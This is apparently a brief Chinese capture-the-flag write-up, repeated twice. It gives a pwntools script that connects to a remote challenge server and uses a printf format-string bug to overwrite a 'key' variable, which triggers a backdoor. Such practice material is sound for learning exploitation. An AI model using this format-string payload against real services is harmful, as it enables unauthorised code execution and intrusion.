给了个后门,pie未开,直接通过printf漏洞将key写为指定值即可。
from pwn import *
p = remote('www.bmzclub.cn', 21355)
context(arch='i386', log_level = 'debug')
payload = fmtstr_payload(12, {0x0804a048: 35795746}) #key = xxxx
p.sendline(payload)
p.interactive()
给了个后门,pie未开,直接通过printf漏洞将key写为指定值即可。
from pwn import *
p = remote('www.bmzclub.cn', 21355)
context(arch='i386', log_level = 'debug')
payload = fmtstr_payload(12, {0x0804a048: 35795746}) #key = xxxx
p.sendline(payload)
p.interactive()